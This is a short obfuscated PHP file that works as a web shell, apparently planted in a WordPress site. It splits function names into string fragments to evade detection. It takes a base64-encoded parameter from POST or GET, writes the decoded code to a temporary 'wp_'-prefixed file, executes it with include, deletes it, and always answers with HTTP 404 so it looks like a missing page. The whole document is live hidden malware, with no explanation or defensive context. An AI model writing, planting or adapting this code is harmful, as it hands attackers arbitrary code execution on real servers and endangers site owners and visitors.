<?php
try{
$d6e0a0=array('sys_get_t'.'emp_dir','base64'.'_decode','unli'.'nk','array_key_ex'.'ists','tem'.'pnam','file_pu'.'t_contents');
$b35c7e='bdec3'.'533';
if($d6e0a0[3]($b35c7e,$_POST)){
$mbb51e=$d6e0a0[1]($_POST[$b35c7e]);
}elseif($d6e0a0[3]($b35c7e,$_GET)){
$mbb51e=$d6e0a0[1]($_GET[$b35c7e]);
}else{$mbb51e=null;}
if($mbb51e){
$kc3df6=$d6e0a0[4]($d6e0a0[0](),'w'.'p_');
if($kc3df6){
$d6e0a0[5]($kc3df6,'<'.'?ph'.'p '.$mbb51e);
http_response_code(404);
@include_once($kc3df6);
@$d6e0a0[2]($kc3df6);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
